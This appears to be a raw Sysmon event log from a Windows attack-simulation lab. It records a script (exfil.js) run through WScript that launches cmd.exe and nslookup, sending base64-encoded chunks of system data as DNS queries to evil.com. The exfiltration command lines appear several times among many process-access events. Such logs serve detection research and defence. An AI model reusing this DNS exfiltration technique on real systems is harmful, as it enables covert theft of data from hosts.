LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B8-629A-993F-000000005F02}7656C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbzr.tmp 2>&1 10341000x8000000000000000198350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.533{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-9A3F-000000005F02}2932C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.533{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-9A3F-000000005F02}2932C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.533{2E1864BB-17B8-629A-9A3F-000000005F02}29325588C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-993F-000000005F02}7656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.515{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-9A3F-000000005F02}2932C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.499{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-993F-000000005F02}7656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.499{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.499{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.499{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.499{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.499{2E1864BB-17A1-629A-783D-000000005F02}55527384C:\Windows\System32\WScript.exe{2E1864BB-17B8-629A-993F-000000005F02}7656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.512{2E1864BB-17B8-629A-993F-000000005F02}7656C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbzr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.499{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgsiw.tmpMD5=A05FE277EAD578D85B93DE56B6EB0A01,SHA256=0DDAD6A171E00B4C55CFFC9B3292AFE046D71EAF195601FF934293413FA92292,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000198338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.044{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52518- 354300x8000000000000000198337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.044{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52517- 354300x8000000000000000198336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.043{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52516- 354300x8000000000000000198335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.947{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52515- 354300x8000000000000000198334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.946{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52514- 354300x8000000000000000198333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.946{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52513- 10341000x8000000000000000198332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.443{2E1864BB-17B8-629A-973F-000000005F02}79484860C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-983F-000000005F02}6892C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.427{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.427{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.427{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.427{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.427{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-983F-000000005F02}6892C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.427{2E1864BB-17B8-629A-963F-000000005F02}54847596C:\Windows\system32\cmd.exe{2E1864BB-17B8-629A-983F-000000005F02}6892C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.433{2E1864BB-17B8-629A-983F-000000005F02}6892C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B8-629A-963F-000000005F02}5484C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgsiw.tmp 2>&1 10341000x8000000000000000198324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.395{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-973F-000000005F02}7948C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.395{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-973F-000000005F02}7948C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.393{2E1864BB-17B8-629A-973F-000000005F02}79484860C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-963F-000000005F02}5484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.374{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-973F-000000005F02}7948C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.358{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-963F-000000005F02}5484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.358{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.358{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.358{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.358{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 